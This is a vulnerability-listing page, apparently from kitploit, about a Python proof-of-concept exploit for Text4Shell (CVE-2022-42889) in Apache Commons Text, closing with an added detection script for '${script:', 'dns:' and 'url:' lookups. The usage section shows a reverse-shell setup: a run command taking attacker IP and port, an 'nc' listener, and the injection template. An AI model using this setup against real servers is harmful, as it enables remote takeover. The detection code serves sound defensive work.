Vulnerability Details
Basic Information
| Title | Text4Shell-Exploit – A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10 |
|---|---|
| Type | kitploit |
| Published | 2025-04-23T12:30:00 |
| Last Seen | 2025-04-23T13:56:09 |
| CVSS Score | 9.8 (CRITICAL) |
CVSS v3 Details
| Attack Vector | NETWORK |
|---|---|
| Attack Complexity | LOW |
| Privileges Required | NONE |
| User Interaction | NONE |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | HIGH |
CVE Information
| CVE IDs | CVE-2022-42889 |
|---|---|
| CWE | |
| Bulletin Family | tools |
Description
A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the `StringSubstitutor` class with interpolation enabled, allowing injection of `${script:...}` expressions to execute arbitrary system commands.
In this PoC, exploitation is demonstrated via the `data` query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.
**Disclaimer**: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.
## Description
This is a custom Python3 exploit for the Apache Commons Text vulnerability known as **Text4Shell** (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by `StringSubstitutor`.
Tested against:
- Apache Commons Text < 1.10.0
- Java applications using `${script:...}` interpolation from untrusted input
## Usage
```bash
python3 text4shell.py
```
## Example
```bash
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
```
Make sure to set up a listener on your attacking machine:
```bash
nc -nlvp 4444
```
## Payload Logic
The script injects:
```
${script:javascript:java.lang.Runtime.getRuntime().exec(…)}
```
The reverse shell is sent via the `/data` parameter using a POST request.
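On the detection side, the `${script:...}` expression described above can be searched for in request parameters. The following is an added example, not part of the original tool or page: it flags URL-encoded parameter values that carry the `script`, `dns` or `url` lookup prefixes, which Apache Commons Text 1.10.0 disables by default. The function names and sample inputs are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Lookup prefixes disabled by default from Commons Text 1.10.0 onward.
RISKY_PREFIXES = ("script", "dns", "url")
# Matched case-insensitively and with optional whitespace, as a conservative choice.
PATTERN = re.compile(r"\$\{\s*(" + "|".join(RISKY_PREFIXES) + r")\s*:", re.IGNORECASE)


def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL-encoding so a double-encoded ${...} is still visible."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_parameters(encoded_params: str) -> list[tuple[str, str]]:
    """Return (parameter name, lookup prefix) for each suspicious parameter.

    `encoded_params` is a query string or form-encoded POST body.
    """
    hits = []
    for name, value in parse_qsl(encoded_params, keep_blank_values=True):
        match = PATTERN.search(decode_fully(value))
        if match:
            hits.append((name, match.group(1).lower()))
    return hits


# Constructed sample inputs (not captured traffic); the payload body is a placeholder.
SAMPLES = [
    "data=hello+world",
    "data=%24%7Bscript%3Ajavascript%3APLACEHOLDER%7D",
    "q=%2524%257BDNS%253Aexample.test%257D",      # double-encoded, upper-case prefix
    "note=price+is+%2410+%7Bapprox%7D",           # "$" and "{" but no lookup
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, "->", flag_parameters(sample) or "clean")
```

A hit identifies the parameter to review; whether the application is actually exposed still depends on the Commons Text version in use and on whether that value reaches `StringSubstitutor`.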
Impact Assessment
| Base Score | 9.8 |
|---|---|
| Severity | CRITICAL |